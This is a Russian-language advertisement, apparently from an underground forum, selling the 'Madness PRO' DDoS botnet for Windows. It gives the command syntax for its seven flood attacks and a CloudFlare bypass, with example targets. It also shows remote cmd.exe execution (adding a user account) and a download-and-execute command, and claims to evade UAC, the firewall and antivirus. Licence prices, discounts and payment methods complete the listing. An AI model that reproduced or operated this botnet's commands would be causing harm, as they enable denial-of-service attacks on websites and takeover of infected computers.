Madness DDoS System PRO

1. Madness PRO
2.  
3. Дата релиза: 01.09.2013
4.  
5. История создания:
6. Летом 2012-го года мы задумались о создании принципиально-нового ДДОС бота для тестирования собственных веб-ресурсов на отказоустойчивость, так как ни одна из протестированных систем не заслужила даже оценки "4".
7. Тестируемые семплы во время работы пожирали память, загружали процессор локальной машины, вылетали с ошибками, зависали на 50% загрузки CPU, неправильно делали записи в реестре, вызывали срабатывание защитных систем, множество весомых ошибок было найдено в панелях управления.
8. Для создания своей системы мы подробно изучили: BlackEnergy(исходный код), gbot (дисассемблинг), DirtJumper(дисассемблинг), Darkness Optima(исходный код, приобретен по договору), iBot(исходный код, приобретен по договору), w3Bot (исходный код), так же были изучены исходные коды Zeus и многих околотемных программ.
9.  
10. Возможности
11. - написан на C++, легко криптуется, имеет малый вес (сжатый семпл < 15кб)
12. - полная совместимость со всеми Windows семейства NT (x86 и x64)
13. - Бот имеет 7 типов атак
14. - стабильность в системе. Показатели нагрузки на CPU и ОЗУ очень равномерные.
15. - Не привлекает внимание UAC и Windows Firewall
16. - умеет устанавливать port, referal и cookies индивидуально для каждой цели
17. - поддерживает до 10-ти целей одновременно
18. - имеет очень низкую нагрузку на CPU благодаря новой, сложной системе парсинга команды (во всех аналогах парсинг проходит внутри функции, в множество потоков - это нагружает процессор лишней работой. Новый бот заносит все данные в массив до начала атаки и на функцю приходят уже готовые параметры: адрес, порт, реферал и т.д.)
19. - имеет колоссальную выходную мощь более 1500 http (и более 30 000 UDP) запросов в минуту за счет прямого взаимодействия с сетевыми драйверами даже на десктопных Windows! (только при использовании WinSock) Это примерно в 10 раз больше, чем некоторые аналоги и несколько больше лучших (по этому показателю) конкурентов.
20. - в панели управления отображаются: количество запросов в минуту, права в системе, версия системы.
21. - поддерживает обход CloudFlare защиты (!!!) и многих других, более простых.
22. - поддерживает Slow GET и Slow POST режимы!
23. - в заголовке пакета указывается отключение кеша (Cache-Control: no-cache), что увеличивает нагрузку на сервер.
24. - защита диалога бот-панель спецключем
25.  
26.  
27. Детектирование:
28. при проверке билда (без крипта и упаковки) только 3 антивируса из всех выдали подозрение (AVIRA, ClamAV, VBA32). Во время локальных тестов ключевые АВ: Kaspersky, Nod32, DrWeb, Avast пропустили файл в 100% случаев.
29. линк на результат: [Для просмотра ссылок вам необходимо ЗАРЕГИСТРИРОВАТЬСЯ или АВТОРИЗИРОВАТЬСЯ ]
30.  
31.  
32. Режимы атаки и команды
33. Так как система является профессиональной синтаксис комманд давольно сложен, но только на первый взгляд =) Синтаксис команд обратносовместим с системой Darkness.
34.  
35. dd1 Основной режим работы по HTTP протоколу методом GET, используя соккеты. Поддерживает ***cookies и $$$ref и допускает до 10 целей одновременно (разделитель ";"). Самая быстрая по количеству запросов атака. Пример: dd1=http://ya.ru***cookies$$$referal;http://mail.ru***cookies2$$$referal2
36.  
37. dd2 Тот же режим, что и dd1, только метод POST. Добавляется обязательный параметр @@@post_data. Так же поддерживается до 10-ти целей. Пример: dd2=http://forum.ru/index.php***cookies$$$referal@@@login=yyy&password=hhh, эта команда запостит логин yyy и пароль hhh на скрипт [Для просмотра ссылок вам необходимо ЗАРЕГИСТРИРОВАТЬСЯ или АВТОРИЗИРОВАТЬСЯ ]
38.  
39. dd3 атака по HTTP методом GET используя системную библиотеку WinInet.dll. Старая-добрая атака, используемая в многих Delphi ботах. Медленная из-за ограничений десктопных Windows. Не поддерживает реферал и куки, поддерживает до 10 целей. Пример: dd3=http://host.com/script.php
40.  
41. dd4 атака по HTTP методом POST используя системную библиотеку WinInet. То же что и dd3, только POST. Пример:
42. dd4=http://host.com/script.php@@@@@@login=yyy&password=hhh
43.  
44. dd5 ICMP атака (пинги). Поддерживается до 10 целей. Пример dd5=198.168.0.1;199.0.0.1
45.  
46. dd6 UDP атака. Поддерживается до 10 целей. Обязательные параметры: порт и текст. Пример: dd6=192.168.0.2:27015@@@flud_text
47.  
48. dd7 атака по HTTP методом GET используя системную библиотеку URMON.dll Средняя по скорости атака, поддерживает до 10 целей и не поддерживает cookies и referal
49.  
50. cfa команда обхода защиты CloudFlare (!). Используется ТОЛЬКО во время работы dd7. Не оставнавливает выполнение команды dd7. Суть проста - бот выполняет ява скрипт, получает нужную cookie и CloudFlare считает запросы сделанные dd7 авторизованными. Пример: dd7=http://site.ru/index.php, затем (через полторы минуты) cfa=http://site.ru/index.php
51.  
52. cmd команда выполняется в коммандном интерпритаторе cmd.exe на локальной машине. Не останавливает выполнение других команд. Пример: cmd=net user goodwin /add
53.  
54. exe команда на загрузку и выполнение EXE файла. Не останавливает выполнение других команд. Файл сохраняется под тем же именем, под которым он был в интернете. Производится 3 попытки скачать файл. Пример: exe=http://site.com/filename.exe
55.  
56. Панель управления:
57. Мы использовали измененную на ~70% ПУ от другого комплекса (приобретенную по договору на изменение и перепродажу), переписав ее практически полностью, так как было обнаружено слишком много ошибок и код не понравился. Естественно все было исправлено и оптимизировано - новая ПУ Вам понравится!
58.  
59.  
60. Демонстрация:
61. Так-как система очень мощная и для демонстрации возможностей нужно всего 15-20 ботов, которые всегда в наличии - селлеры постараются продемонстрировать мощность.
62.  
63. Цены:
64. - тестовая лицензия $0 (только для проверяющих на форумах и тестеров. обновления не предусмотрены)
65. - базовая лицензия $500 (обновление/ребилд $50, обновление на новую версию $100, цена на модули будет установлена позже)
66. - полная лицензия $950 (все обновления, ребилды и модули бесплатны)
67.  
68. Скидки:
69. - 30% для владельцев GBot/Andromeda/Dirt Dumper, базовой лицензии iBot, базовой/серебряной лицензии Darkness
70. - 50% для владельцев золотой и бриллиантовой лицензии Darkness/iBot
71. - 20% дополнительно для тех, кто приобретал указанные выше продукты не более недели назад.
72.  
73. Оплата
74. к оплате принимаются ЯД, WMR/WMZ/WMB, PM и LR. А так же любая валюта через обменник.
75.  
76. Гарантии:
77. Готовность работать через гаранта любого, известного форума.
78.  
79. Рассрочка
80. Для имеющих репутацию и/или аттестаты людей предусмотрена система рассрочки. Обсуждается индивидуально.